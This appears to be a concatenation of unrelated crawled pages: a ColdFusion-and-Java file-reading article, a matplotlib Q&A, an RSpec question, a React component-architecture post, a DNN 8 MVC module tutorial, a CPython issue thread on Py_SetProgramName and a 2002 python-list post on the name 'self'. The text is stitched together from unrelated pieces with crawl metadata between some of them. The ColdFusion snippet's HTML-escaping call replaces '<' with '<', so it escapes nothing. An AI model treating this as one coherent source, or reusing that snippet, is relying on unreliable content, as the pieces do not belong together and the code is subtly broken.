curLine=reader.readLine()> <!--- now loop until we reach the end of the file ---> <cfloop condition="not #reader.isEOF()#"> <!--- display the current line ---> <cfoutput>#replace(curLine,"<","<","ALL")#<br> </cfoutput> <!--- flush the output buffer (cf5 only) ---> <cfflush> <!--- each call to readLine( ) reads the /next/ line, until the end of the file is reached, at which point isEOF( ) starts returning "true" ---> <cfset curLine=reader.readLine()> </cfloop> </body> </html> Documentation on java.io.FileReader can be found at: Conclusion ColdFusion makes leveraging Java classes easy, which greatly increases the reach of what is possible from within a ColdFusion page. Additionally, we have seen that it is easy to extend native Java classes into custom subclasses that are specifically tailored to an application. Use of this website signifies your agreement to the Terms of Use and Online Privacy Policy (updated 07-08-2008). Search powered by Google™
http://www.adobe.com/devnet/server_archive/articles/leveraging_java_classes_cf.html
crawl-002
refinedweb
1,170
56.66
I have accidentally assigned a tuple to a pyplot function (that is xticks) and the function became a tuple. Restoring its previous type as a function was not possible. Is this normal or is it considered as an issue ? import matplotlib.pyplot as plt import matplotlib as mpl %matplotlib inline print mpl.__version__ # Version : 1.5.1 br = (1.0,2.0,3.0) brand = ('Ford','Audi','Wolskvagen') count = (100,2000,10000) plt.xticks((1,2,3),('Ford','Audi','Wolskvagen')) plt.scatter(x = br,y = count,c = col,s=count) print type(plt.xticks) #<type 'function'> plt.xticks = ((1,2,3),('Ford','Audi','Wolskvagen')) print type(plt.xticks) #<type 'tuple'> #Now, I can't use xticks function any more... In Python, there is no such thing as a protected variable. You can write variables in the current namespace, to a module, with only a few exceptions (builtin types that are not subclassed, as well as any class that defines __slots__ (thanks Alex Hall) are the main exceptions). For example: >>> from collections import namedtuple >>> x = namedtuple('x', 'a b') >>> y = x(1, 3) >>> y.a = 3 AttributeError: 'X' object attribute 'a' is read-only >>> a.t = 3 AttributeError: 'X' object has no attribute 't' This is only true for a few built-in types, as well as classes that override __setattr__ in a specific manner, or that use properties with no property setter. The general rule is, anything can be written to, whether it's a class, module, function, etc. Yes, functions. >>> def a(x): ... pass >>> a.b = 1 >>> a.b 1 So, how do you fix an error if accidentally overwrite a variable in a module you imported? Either, restart the Python interpreter or reload the module. Python2 Reloading >>> import matplotlib.pyplot as plt >>> plt.xticks = 5 >>> plt = reload(plt) >>> plt.xticks <function matplotlib.pyplot.xticks> Python3 Reloading >>> import matplotlib.pyplot as plt >>> import importlib >>> plt.xticks = 5 >>> plt = importlib.reload(plt) >>> plt.xticks <function matplotlib.pyplot.xticks>
https://codedump.io/share/Zj1ApfkdaeLA/1/python-allows-assigning-tuple-to-function-xticks-of-pyplot
CC-MAIN-2016-44
refinedweb
328
70.19
#======================================================================== # # Changes # # DESCRIPTION # Revision history for the XML::Schema module. # # AUTHOR # Andy Wardley <abw@kfs.org> # # REVISION # $Id: Changes,v 1.3 2003/01/10 11:20:12 abw Exp $ #======================================================================== #------------------------------------------------------------------------ # Version 0.07 - 11th January 2003 #------------------------------------------------------------------------ * Cleaned up some of the documentation for a tentative first alpha release (at last!). #------------------------------------------------------------------------ # Version 0.06 - 20th December 2001 #------------------------------------------------------------------------ * Moved constant definitions into XML::Schema::Constants and added t/constants.t to test. * Added factory() method to XML::Schema::Base, cleaned up some further code in there, updated documentation and t/base.t tests. * Added XML::Schema::Wildcard and t/wildcard.t. At the moment this is working but the interface may change slightly pending some further investigation required into namespace processing. The process options SKIP, LAX and STRICT are supported but they currently don't have any effect as no namespace processing is performed. Note also that this implementation works only on namespace prefixes and doesn't resolve them into their actual namespace values (which it should). * Added XML::Schema::Attribute::Group and totally cleaned up and (mostly) completed the implementation of attributes, including scoped type management, relocatable attribute groups, nested groups, wildcards within nested groups, usage: OPTIONAL, REQUIRED, PROHIBIT. The only support missing is in those areas that wildcards lack, described above. Added t/attrgroup.t and various new tests to t/attribute.t * Changed attribute to perform FIXED constraint check on the post- validation, but pre-activation value. Previously, this was hacked by scheduling an instance action to check the fixed constraint. * Had a major overhaul of the documentation, correcting and completing many more pages. Still got some ay to go... #------------------------------------------------------------------------ # Version 0.05 - 19th July 2001 #------------------------------------------------------------------------ * Added the XML::Schema::Particle::Choice module to implement the choice model group. * Fixed a bug in the complex type handler which was ignoring the use of any attributes which hadn't been defined for the type. Now returns an error of the form "unexpected attribute(s): foo, bar, baz" * Added the XML::Schema::Type::Provider module to replace the Scope/Scoped modules for handling type management, but haven't yet activated it. There should (I think) be a single module to manage types, model groups, notations, attribute groups, etc. #------------------------------------------------------------------------ # Version 0.04 - 10th July 2001 #------------------------------------------------------------------------ * Added some sample templates in 'examples/templates' directory to reconstruct schema output as XML. #------------------------------------------------------------------------ # Version 0.03 - 10th July 2001 #------------------------------------------------------------------------ * Added ID and IDREF simple types with resolution happening via the XML::Schema::Instance object within the end_element() handler of a complex type which defines attributes of type ID and/or IDREF. #------------------------------------------------------------------------ # Version 0.02 - 10th July 2001 #------------------------------------------------------------------------ * Renamed XML::Schema::Schedule to XML::Schema::Scheduler * Added 'use' option to XML::Schema::Attribute. This should really be positioned in XML::Schema::Type::Complex but it's easier to put it in here for now. #------------------------------------------------------------------------ # Version 0.01 #------------------------------------------------------------------------ * initial version
https://metacpan.org/changes/distribution/XML-Schema
CC-MAIN-2015-32
refinedweb
471
56.66
I've attempted to create a model, which needs to pass a series of validation tests in RSpec. However, I constantly get the error expected #<Surveyor::Answer:0x0055db58e29260 @question=#<Double Surveyor::Question>, @value=5> to respond to `valid?` module Surveyor class Answer attr_accessor :question, :value def initialize(params) @question = params.fetch(:question) @value = params.fetch(:value) end end end module Surveyor class Question attr_accessor :title, :type def initialize(params) @title = params.fetch(:title, nil) @type = params.fetch(:type) end end end RSpec.describe Surveyor::Answer, '03: Answer validations' do let(:question) { double(Surveyor::Question, type: 'rating') } context "question validation" do context "when the answer has a question" do subject { described_class.new(question: question, value: 5) } it { should be_valid } end end RSpec doesn't actually have a matcher called be_valid, instead it has some dynamic predicate matchers: For any predicate method, RSpec gives you a corresponding matcher. Simply prefix the method with be_and remove the question mark. Examples: expect(7).not_to be_zero # calls 7.zero? expect([]).to be_empty # calls [].empty? expect(x).to be_multiple_of(3) # calls x.multiple_of?(3) so by calling it { should be_valid }, your subject has to respond to a valid? method. If you're testing an ActiveRecord model, those have a valid? method, but your model does not. So, if you want to test that your Answer is valid, you need to decide "what is a valid answer?" and write a method that checks for those conditions. If you want an API similar to Rails model, you might be interested in using ActiveModel::Validations
https://codedump.io/share/cZwz2LTbEzd3/1/what-is-39valid39-in-rspec-where-can-i-look-at-it
CC-MAIN-2021-21
refinedweb
256
51.24
7.9. Implementing Breadth First Search¶. To keep track of its progress, BFS colors each of the vertices white, gray, or black. All the vertices are initialized to white when they are constructed. A white vertex is an undiscovered vertex. When a vertex is initially discovered it is colored gray, and when BFS has completely explored a vertex it is colored black. This means that once a vertex is colored black, it has no white vertices adjacent to it. A gray node, on the other hand, may have some white vertices adjacent to it, indicating that there are still additional vertices to explore. The breadth first search algorithm shown in Listing 2 below uses the adjacency list graph representation we developed earlier. In addition it uses a Queue, a crucial point as we will see, to decide which vertex to explore next. In addition the BFS algorithm uses an extended version of the Vertex class. This new vertex class adds three new instance variables: distance, predecessor, and color. Each of these instance variables also has the appropriate getter and setter methods. The code for this expanded Vertex class is included in the pythonds package, but we will not show it to you here as there is nothing new to learn by seeing the additional instance variables. BFS begins at the starting vertex s and colors start gray to show that it is currently being explored. Two other values, the distance and the predecessor, are initialized to 0 and None respectively for the starting vertex. Finally, start is placed on a Queue. The next step is to begin to systematically explore vertices at the front of the queue. We explore each new node at the front of the queue by iterating over its adjacency list. As each node on the adjacency list is examined its color is checked. If it is white, the vertex is unexplored, and four things happen: The new, unexplored vertex nbr, is colored gray. The predecessor of nbris set to the current node currentVert The distance to nbris set to the distance to currentVert + 1 nbris added to the end of a queue. Adding nbrto the end of the queue effectively schedules this node for further exploration, but not until all the other vertices on the adjacency list of currentVerthave been explored. Listing 2 from pythonds.graphs import Graph, Vertex from pythonds.basic import Queue def bfs(g,start): start.setDistance(0) start.setPred(None) vertQueue = Queue() vertQueue.enqueue(start) while (vertQueue.size() > 0): currentVert = vertQueue.dequeue() for nbr in currentVert.getConnections(): if (nbr.getColor() == 'white'): nbr.setColor('gray') nbr.setDistance(currentVert.getDistance() + 1) nbr.setPred(currentVert) vertQueue.enqueue(nbr) currentVert.setColor('black') Let’s look at how the bfs function would construct the breadth first tree corresponding to the graph in Figure 1. Starting from fool we take all nodes that are adjacent to fool and add them to the tree. The adjacent nodes include pool, foil, foul, and cool. Each of these nodes are added to the queue of new nodes to expand. Figure 3 shows the state of the in-progress tree along with the queue after this step. In the next step bfs removes the next node (pool) from the front of the queue and repeats the process for all of its adjacent nodes. However, when bfs examines the node cool, it finds that the color of cool has already been changed to gray. This indicates that there is a shorter path to cool and that cool is already on the queue for further expansion. The only new node added to the queue while examining pool is poll. The new state of the tree and queue is shown in Figure 4. The next vertex on the queue is foil. The only new node that foil can add to the tree is fail. As bfs continues to process the queue, neither of the next two nodes add anything new to the queue or the tree. Figure 5 shows the tree and the queue after expanding all the vertices on the second level of the tree. You should continue to work through the algorithm on your own so that you are comfortable with how it works. Figure 6 shows the final breadth first search tree after all the vertices in Figure 3 have been expanded. The amazing thing about the breadth first search solution is that we have not only solved the FOOL–SAGE problem we started out with, but we have solved many other problems along the way. We can start at any vertex in the breadth first search tree and follow the predecessor arrows back to the root to find the shortest word ladder from any word back to fool. The function below (Listing 3) shows how to follow the predecessor links to print out the word ladder. Listing 3 def traverse(y): x = y while (x.getPred()): print(x.getId()) x = x.getPred() print(x.getId()) traverse(g.getVertex('sage'))
https://runestone.academy/runestone/books/published/pythonds/Graphs/ImplementingBreadthFirstSearch.html
CC-MAIN-2019-35
refinedweb
828
73.27
). This Post The point I’d like to get across in this post is why I structure React components the way that I do for this architecture. It pairs nicely with the Director configuration we set up in Part 2, and it allows me to get content up and running quickly. The purpose of this series is more for the purpose of, “I want a thing up and running immediately and don’t want the overhead of a flux framework.” So the overhead of a flux framework, GraphQL/Relay layer, complex webpack configuration, etc. just isn’t worth it (right now). FWIW, an app that I’m working on is using this implementation for its, “Is this a good idea?” phase and, if the answer to that is yes, moving to a more traditional Redux stack will be a necessity. Containers vs. Components vs. Smart vs. Dumb Before reading on, I recommend reading Dan Abramov’s post about Presentation vs Container Components (…). I posted this recommendation in Part 2 as well. When I first started React code, I had an almost identical idea (although not nearly as well articulated or functionally correct) that I referred to as Smart vs Dumb components (which Dan brings up in his post). I like the idea a lot, and I think it’s an excellent introduction to React coding. The concepts emerge naturally and the code separation is easy to navigate, as well as easy to jump into. In short: •A smart component knows about it state. It can initialize, fetch, and update its own state. It will pass state values to children as props. These are sometimes not reusable. •A dumb component does not know about state. It receives data and renders it via props. Dumb components should always be reusable, as they are not coupled to an implementation or valueset. In my code/codebases, I use “Container” and “Component” to reference Smart and Dumb components. Containers contain various amalgamations of components. An example: //A component/dumb component import React from 'react'; import ReactDOM from 'react-dom'; export const ContentSection = React.createClass({ render() { return ( ) } }); In the above component, there is no need for getInitialState or any logic other than render, as the component is dumb, it is prop driven. Another example: //Another dumb component import React from 'react'; import ReactDOM from 'react-dom'; const Comment = React.createClass({ render() { return ( ) } }); Here we have a styled, standardized Comment component that is driven by its parent. This Comment can work with whatever context it lives in, as it is props-driven. Now these have both been very basic examples, but for the most part dumb components should be pretty simple to reason about anyway. They’re dumb. They don’t contain logic or understand why they exist, they just exist. That’s why dumb components are entirely reusable, they fundamentally can’t be coupled to an implementation, as they have no implementation. They really just serve their Containers. So, Containers. Containers can be large and complex. Sometimes Containers aren’t reusable, which is (for the most part) fine. Containers can be reused if their implementation exists in multiple contexts. Think of Facebook. You can comment on a friend’s status update via your own feed, or by going directly to their page and viewing the status update there. In both contexts, the comment will be hitting the same API endpoints, solving the same problem, and managing the exact same state (a comment on a status update). Because of this, a Comment Container that knows about its children, knows about API endpoints, knows about its implementation (in this example, a Status Update) can be reused. Another basic example: //A container const SomeContainer = React.createClass({ getInitialState() { return { comment: '' }; }, change(event) { this.setState({ comment: event.target.value }, Services.updateCommentService); }, render() { return ( ) } }); This is an extremely basic example that doesn’t really do stateful components justice, but the idea is good. The Comment logic doesn’t need to be muddled with the other Container/Component logic, the Container can know about the service/endpoint that needs to get updated for that specific comment; and adding new components to the Container is super easy and doesn’t interfere with the logic of the rest of the implemented components. printState A helper function I wrote has turned out to be extremely useful for me while in development. When a React component calls setState, the state is not updated immediately, so the following code will not work as expected: change(event) { this.setState({ comment: event.target.value }); console.log('STATE', this.state); } However, setState takes an optional callback as a second argument, which will be executed after the state has been updated. So, the helper function: function printState() { console.log('STATE', this.state); } This function will run with the state of whatever component it is applied (because of how the this keyword works). So nearly every time I call setState, I pass it in after the state object just to see what’s happening. For complex Containers that have multiple sub-components, it’s a great way to see how your overall state object is mutating. It seems small, but has saved me a lot of time. After all, state management is one of the hardest things to get right during UI development. HOW DOES THIS YAGNI?! So this post has been about React code creation (I lied earlier, I guess). Hopefully, when I write Part 4 (tying it all together), if Director + Webpack have been configured as directed (pun intended), the app just falls into place. Next post, we’ll go over how Containers/Components play into the Director + Webpack + React + Superagent configuration, and also probably go over a services layer to interract with the rendering layer. A fiddle!: Learn more about JavaScript in our JavaScript Blog Archive. Add new comment
https://www.metaltoad.com/blog/reactjs-architecture-part-3
CC-MAIN-2020-16
refinedweb
969
55.34
On Fri, Feb 24, 2012 at 08:25:30PM -0800, Arve Hjønnevåg wrote:> On Thu, Feb 23, 2012 at 9:16 PM, Matt Helsley <matthltc@us.ibm.com>?> >> > This is an interesting idea, but I'm not sure how well it would work.> > I looked at the epoll code and it looks like it is possible to> activate the wakeup-source from the wait queue function it uses. The> epoll callback will happen without holding evdev client buffer_lock,> so the wakeup-source and buffer state will not always be in sync (this> may be OK, but require more thought). This callback is also called if> no data was added to the queue we are polling on because another> client has grabbed the input device (is this a bug or intended?).> > There is no call into the epoll code when input queue is emptied, so> we can't deactivate the wakeup-source until epoll_wait is called> again. This also should be workable, but result in different stats.> > It does not look like the normal poll and select interfaces can be> extended the same way (since they remove themselves from the> wait-queue before returning to user-space), so user-space has to beYup, that is exactly why epoll is so well suited to this.> changed to use epoll even if select or poll would be a better fit.Either way, modification of application code is necessary, right?> I don't know how many other drivers this would work for. The input> driver will wake up user-space from the same thread or interrupt> handler that queued the event, but other drivers may defer this to> another thread which makes an epoll wakeup-source insufficient.I don't understand how this would be insufficient. So long as theinterrupt causes the wakeup source to prevent the machine from suspendingbefore finishing interrupt handling does it matter whether the eventhandling itself is deferred?In case there's some confusion: I'm not saying that this idea will solveall of the problems, especially:> >>).(endquote)> > ...> >> + snprintf(name, sizeof(name), "%s-%d",> >> + dev_name(&evdev->dev), task_tgid_vnr(current));> >> > This does not look like it will work well with tasks in different pid> > namespaces. What should happen, I think, is the wakeup_source should hold a> > reference to either the struct pid of current or current itself. Then> > when someone reads the file you should get the pid vnr in the reader's> > pid namespace. That way instead of a bogus pid vnr 0 would show up if> > "current" here is not in the reader's pid namepsace.> >> > The pid here is only used for debugging purposes, and used less than> the dev_name. I don't think tracking pid namespaces is worth the> trouble here, so if this is a real problem we can just drop the pid> from the name for now.I think dropping the pid would be the best choice. If it's absolutelynecessary in the output then it should be made to work with pid namespacesbecause the interface will be maintained forever.Cheers, -Matt--To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at
https://lkml.org/lkml/2012/2/27/522
CC-MAIN-2020-50
refinedweb
535
68.3
From: Jaap Suter (J.Suter_at_[hidden]) Date: 2003-03-09 20:37:18 > Then how about simply: > > #ifndef STATIC_NDEBUG > # define BOOST_STATIC_ASSERT2(e) BOOST_STATIC_ASSERT(e) > #else > # define BOOST_STATIC_ASSERT2(e) > #endif I guess that ';' would work in most cases. I can't think of a case where it wouldn't, although it can give warnings on some compilers (try closing a namespace with curly-brace-semi-colon on some compilers). Alternatively, we could use:: > #ifndef STATIC_NDEBUG > # define BOOST_STATIC_ASSERT2(e) BOOST_STATIC_ASSERT(e) > #else > # define BOOST_STATIC_ASSERT2(e) BOOST_STATIC_ASSERT(true) > #endif I'm wondering why we want to make this a 2nd static_assert at all. It seems to me that once we acknowledge that a compile-time program 'runs' at compile time, we have a compile time 'debug' and 'release' mode with the accompanying debug and release versions of the compile time assert. I would like to see the primary STATIC_ASSERT defined this way, but that's just me of course :). Regards, Jaap Suter Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2003/03/45439.php
CC-MAIN-2019-30
refinedweb
181
64.3
So I tidied the code up a bit from last time; no more for loop. Actually, I tidied it up a lot. My goal had been to arrange the data in such a way that I could get a simple moving average of the score difference for each team. That wound up being a semi-lengthy process. So, now, I have a function which will return the game results for a single season: GetSeasonResults = function(year) { games.URL.stem = "" URL = paste(games.URL.stem, year, "/games.htm", sep="") games = readHTMLTable(URL) dfSeason = games[[1]] # Clean up the df dfSeason = subset(dfSeason, Week!="Week") dfSeason = subset(dfSeason, Week!="") dfSeason$Date = as.character(dfSeason$Date) dfSeason$GameDate = mdy(paste(dfSeason$Date, year), quiet=T) year(dfSeason$GameDate) = with(dfSeason, ifelse(month(GameDate) <=6, year(GameDate)+1, year(GameDate))) dfSeason = dfSeason[,c(14, 1, 5, 7, 8, 9)] colnames(dfSeason) = c("GameDate", "Week", "Winner", "Loser", "WinnerPoints", "LoserPoints") dfSeason$Winner = as.character(dfSeason$Winner) dfSeason$Loser = as.character(dfSeason$Loser) dfSeason$WinnerPoints = as.integer(as.character(dfSeason$WinnerPoints)) dfSeason$LoserPoints = as.integer(as.character(dfSeason$LoserPoints)) dfSeason$ScoreDifference = dfSeason$WinnerPoints - dfSeason$LoserPoints dfSeason = subset(dfSeason, !is.na(ScoreDifference)) return(dfSeason) } This means that I may now lapply to get a set of results for many seasons. However, this still isn’t quite what I want. What I’m after is a set of results for an individual team. To do this, I created a function which will zip through the games data to pull out results for a single team. The games data is structured such that a team could appear in either the winner or loser column. I’ve handled this by making two passes through the dataframe. The first pass picks up all the times that the team won, the second picks up all the times the team lost. I then just bind the winning and losing dataframes together. BuildTeamData = function(Team, dfGamesData) { dfWinner = dfGamesData[which(dfGamesData$Winner == Team), c("GameDate", "Week", "Loser", "ScoreDifference")] dfLoser = dfGamesData[which(dfGamesData$Loser == Team), c("GameDate", "Week", "Winner", "ScoreDifference")] dfLoser$ScoreDifference = -dfLoser$ScoreDifference colnames(dfWinner) = c("GameDate", "Week", "OpposingTeam", "ScoreDifference") colnames(dfLoser) = c("GameDate", "Week", "OpposingTeam", "ScoreDifference") dfTeam = rbind(dfWinner, dfLoser) dfTeam$ThisTeam = Team dfTeam = dfTeam[order(dfTeam$GameDate),] return (dfTeam) } The result is a dataframe with twice as many rows as the original set of game data (each winner and loser get their own rows). However, it winds up being an intuitive way to view the results for an individual team. I can now take a moving average of the point differential to use as a predictor of whether or not they’re likely to win. The algorithm is (at the moment) incredibly simple. If a teams average point differential is larger than their opponent, I presume that they will win. Does something this straightforward work? Well, sort of. I used a period of between 9 and 16 prior games, also monkeyed around with capping the absolute value of point differential and applied an exponential smoother so that more recent games would get more weight. The result? If you take the average point differential for the past 10 games and compare, you’ll forecast the winner about 62% of the time. This is hardly something to get excited about, but it’s reliably better than a coin toss. I’m struck by the fact that smoothing and point capping don’t improve the model all that much (results posted at some later time). My intuition is that recent performance takes personnel changes and team morale into account and that a blowout of a weak opponent ought to count for little in predicting the result of a different game. Perhaps these things do matter when other elements of data are introduced, but at present, it doesn’t influence the algorithm all that much. I’ve used this method for two weeks and I’ve predicted the winner about 60% of the time (again actual results to appear in a later post). Given how little opportunity I have to keep up with players and what’s going on, this is high enough to keep things interesting for me. I’ve downloaded the NFL mobile app and look forward to exploring what other information can improve this method. Next step is to see whether offensive and defensive stats are at all useful in predicting a result. I can’t imagine anyone is reading this, but there’s loads more code to generate the moving averages and test the results of the model. It’s available to anyone who’d care to...
https://www.r-bloggers.com/nfl-prediction-algorithm-1/
CC-MAIN-2016-44
refinedweb
763
55.03
6 Easy Steps to Get Started with MVC Module Development in DNN 8 MS Visual Studio/.NET, Dot Net Nuke, ASP.NET, HTML and CSS, Web, Software Development, C# .NET Application Development August Karlstedt 10/28/2016 1 Comments In the beginning of the year, DNN (formerly DotNetNuke) was updated to support MVC modules. MVC is the latest version of ASP.NET in which the Model-View-Controller paradigm is at the core. This article won't be a look into what MVC is or a comparison with WebForms, but instead will give a quick guide into starting DNN MVC module development. While there are some guides available that give you similar information, I found it a bit difficult to get started developing MVC modules in DNN. For reference, the articles I used are at the bottom of this blog. Here's an overview of the steps we'll take to get started. Prerequisites Templates Setup Build Installation Next Steps References 1. Prerequisites For this quick start, you'll need a few things before we can dive in. First, you'll need to have Visual Studio 2015 installed. The express editions have been reported to be incompatible with the templates we'll be using later, but this may not be true by the time you're reading this. Next, you'll need to have IIS (Internet Information Services) setup with a local installation of DNN (version 8 or higher). There are many tutorials on how to do this around the web. You'll need to install IIS and Microsoft SQL Server, then you can install DNN by downloading the latest _install.zip from DNN's GitHub releases. Once those are all set up, you're ready to go. 2. Templates You could create a module from scratch. But why would you do that when a DNN expert created templates for you to use? Download the templates from the Visual Studio Gallery and run through the installation procedure. 3. Setup Now that everything is set up, we can actually dive into creating the module. In Visual Studio, select File -> New -> Project In the New Project window, select Templates -> Visual C# -> DotNetNuke and you'll see a listing of the types of projects the templates have provided. To create an MVC module, we'll select DotNetNuke 8 C# DAL2 MVC Module. There are three other fields we must configure: Name, Location, and Solution name. Name: Enter a name for your project (it's best not to use any spaces or special characters for this) Location: This is important to point this to the correct folder in DNN: /DesktopModules/MVC/. Depending on your installation directory, the folder should be something like C:\Dev\Projects\DMC_Website\Alpha\DesktopModules\MVC\ where "Alpha" is the root of your DNN installation. Solution name: We're not actually going to be using this field. Uncheck the box on the right that says "Create directory for solution" and the solution name textbox will be greyed out. Confirm your settings look similar to mine and then click OK. A Project Setup Wizard dialog box will appear asking for some project information. Many of these are self explanatory, so I will only address the two that are a bit tricky. Namespace: Whatever namespace you want your module to live in. The templates will automatically include your project name in the namespace, so no need to enter it here. Make sure you include the last period. E.g. DMC. Local Dev URL: By default this is set up to point to dnndev.me, which is actually set up to point back to 127.0.0.1 (your localhost). What you enter here depends on what settings you've set your DNN install up with. For my installation, I access my local DNN install through. Therefore, I am going to enter localhost as my Local Dev URL. Initial values Updated values (note: the owner website field includes https:// but the textbox isn't large enough to display it. Be sure to include it in your URL.) Once all fields have been complete, click OK. 4. Build Now that the initial project setup is complete, you'll be presented with a web page in Visual Studio that says * Important *. These are steps that you should read carefully and follow to ensure your project will work correctly. I'll provide a quick overview of these steps in case the original wording is confusing for anyone. First, check IIS to see if any of your folders were converted to virtual directories or applications. To do this, open IIS, expand your site's dropdown and check what icon is displayed next to your DesktopModules folder or the MVC folder inside of the DesktopModules folder. If it's anything other than a yellow folder, right click it and click remove. Next, in Visual Studio, right click and delete the web.config files that are in the solution. You can now build the module! change the solution configuration dropdown from Debug to Release and then select Build -> Build You'll get an install .zip file in your module's install/ directory. 5. Installation Now, in DNN, go to Hosts -> Extensions and click Install Extension, selecting your install .zip file that you previously built. If everything goes well, then the module is now installed and can be placed on any page. 6. Next Steps Once you've dragged the module into a page, you'll see a demo application that includes multiple views, database interaction, and more. Simply build the project in debug mode to automatically copy the new DLL to the /bin folder. 7. References While you're here, check out DMC's Web Application Development and ASP.NET & ASP.NET MVC Development services so we can get started on your next DNN MVC module! Comments # August Karlstedt Friday, October 28, 2016 12:30 PM Be sure to post a comment if you have any issues! Post a comment Name (required) Email (required) Enter the code shown above: Notify me of followup comments via e-mail
https://www.dmcinfo.com/latest-thinking/blog/id/9305/6-easy-steps-to-get-started-with-mvc-module-development-in-dnn-8
CC-MAIN-2021-43
refinedweb
1,007
65.01
Created on 2014-07-30 17:10 by jj, last changed 2014-08-01 13:07 by zach.ware. This issue is now closed. The documentation and the code example at #include <Python.h> int main(int argc, char *argv[]) { Py_SetProgramName(argv[0]); /* optional but recommended */ Py_Initialize(); PyRun_SimpleString("from time import time,ctime\n" "print('Today is', ctime(time()))\n"); Py_Finalize(); return 0; } contradicts the actual implementation of the code: which leads to compiler errors. To fix them, ugly wchar_t to char conversions are needed. Also, I was hoping, Python 3.3 finally switched from wchar_t to char and UTF-8. at least that's how I understood PEP 393 see also: => Are the docs wrong (which i hope are not, the example is straightforward and simple-stupid with a char*), or is cpython wrong? You were misinterpreting PEP 393 - it is only about the representation of string objects, and doesn't affect any pre-existing API. Changing Py_SetProgramName is not possible without breaking existing code, so it could only happen in Python 4. A proper solution might be adding Py_SetProgramNameUTF8, but it could trick people into believing that argv[0] actually is UTF-8 on their system, which it might not be. Providing Py_SetProgramNameASCII might be better, but it could fail if argv[0] contains non-ASCII characters. Yet another solution could be to expose _Py_char2wchar to the developer. In any case: yes, the example is outdated, and only valid for Python 2. This issue is why I created the issue #18395. I'd say Python should definitely change its internal string type to char*. Exposing "handy" wchar_t->char conversion functions don't resolve the data represenation enhancement. Jonas, why do you say that? See also issue20466 (which has a patch for this, but I cannot speak for its effectiveness). I'd be in favor of closing that issue and this one as duplicates of #18395, and noting in #18395 that the embedding example must be updated before that issue is closed. Martin, i think the most intuitive and easiest way for working with strings in C are just char arrays. Starting with the main() argv being char*, probably most programmers just go with char* and all the encoding just works. This is because contact with encoding is only needed for the user input software (xorg, keyboard input) and user output (-> your terminal emulator, the gui, ...). No matter what stuff your program receives, the encoding only matters for the actual output display software to select the correct visual representation. Requiring a conversion to wide chars just increases the interface complexity and adds really unneeded data transformations that are completely obsolete with UTF-8. What I'd really like to see in CPython is that the internal storage (and the way it's exposed in the C-API) is just raw bytes (=> char*). This allows super-easy integration in C projects that probably all just use char as their string type (see the doc example mentioned earlier). PEP 393 states: "(..) the specification chooses UTF-8 as the recommended way of exposing strings to C code." And for that, I think using char instead of wchar_t is a better solution for interface developers. > What I'd really like to see in CPython is that the internal storage (and the way it's exposed in the C-API) is just raw bytes (=> char*). Python is portable, we care of Windows. On Windows, wchar_t* is the native type for strings (ex: command line, environment variables). New changeset 94d0e842b9ea by Victor Stinner in branch 'default': Issue #18395, #22108: Update embedded Python examples to decode correctly I updated the embedding and extending examples but I didn't try them. @Jonas: Can you please try the updated examples? Indeed, that should do it, thanks. I still pledge for Python 4? always using char* internally to make this conversion obsolete ;) (except for windows) > I still pledge for Python 4? always using char* internally to make this conversion obsolete ;) (except for windows) I don't understand your proposition. We try to have duplicating functions for char* and wchar*. Jonas: Python's string type is a Unicode character type, unlike C's (which is wishy-washy when it comes to characters outside of the "basic execution character set"). So just declaring that all APIs take UTF-8 will *not* allow for easy integration with other C code; instead, it will be the source of moji-bake. In any case, this issue appears to be resolved now; thanks for the patch.
https://bugs.python.org/issue22108
CC-MAIN-2019-39
refinedweb
751
63.29
As part of our face detection algorithm, we will reject cat faces that intersect with human faces. The reason is that the cat face cascade produces more false positives than the human face cascade. Thus, if a region is detected as both a human face and cat face, it is probably a human face in reality. To help us check for intersections between face rectangles, let's write a utility function, intersects. Declare the function in a new header file, GeomUtils.h, with the following code: #ifndef GEOM_UTILS_H #define GEOM_UTILS_H #include <opencv2/core.hpp> namespace GeomUtils { bool intersects(const cv::Rect &rect0, const cv::Rect &rect1); } #endif // !GEOM_UTILS_H Two rectangles intersect if (and only if) a corner ... No credit card required
https://www.oreilly.com/library/view/ios-application-development/9781785289491/ch04s07.html
CC-MAIN-2019-09
refinedweb
121
50.12
I would like rather to have something akin of Pascal's or VB's 'with', e.g., with self: bla1, bla2 ... Grtz, Giorgi Fernando Pérez wrote: > I'm curious as to why 'self' was chosen instead of the shorter 'my' for > naming the instance passed to methods. > > def meth(my,x,y,z): > ... > my.x=1 > my.y=2 > > is IMHO even more naturally readable than > > def meth(self,x,y,z): > ... > self.x=1 > self.y=1 > > and saves typing two characters every time (not negligible considering how > many times you type self!). > > In my code I respect the 'self' convention simply because I don't like > breaking well-accepted conventions unless there's a tryly compelling reason > to do so. But lately I've ended up using the following little function a lot: > > def setattr_list(obj,alist,nspace): > """Set a list of attributes for an object taken from a namespace. > > setattr_list(obj,alist,nspace) -> sets in obj all the attributes listed in > alist with their values taken from nspace, which must be a dict (something > like locals() will often do). > > Note that alist can be given as a string, which will be automatically > split into a list on whitespace.""" > > if type(alist) is types.StringType: > alist = alist.split() > for attr in alist: > val = eval(attr,nspace) > setattr(obj,attr,val) > > in the following manner: > > def meth(self,...): > x=1 > y=2 > ... > > setattr_list(self,'x y z....',locals()) > > because I hate the extra typing. I think with a shorter, leaner 'my' I > wouldn't do this and the code would be overall clearer. > > Any comments on the history of self's choice? > > And on using shorter conventions like 'my'? (I won't go as far as using > simply 's', single letter names should only be used for simple counters IMO). > > Anyway, just curious before going to bed :) > > Cheers, > > f
https://mail.python.org/pipermail/python-list/2002-January/144131.html
CC-MAIN-2020-24
refinedweb
310
65.93
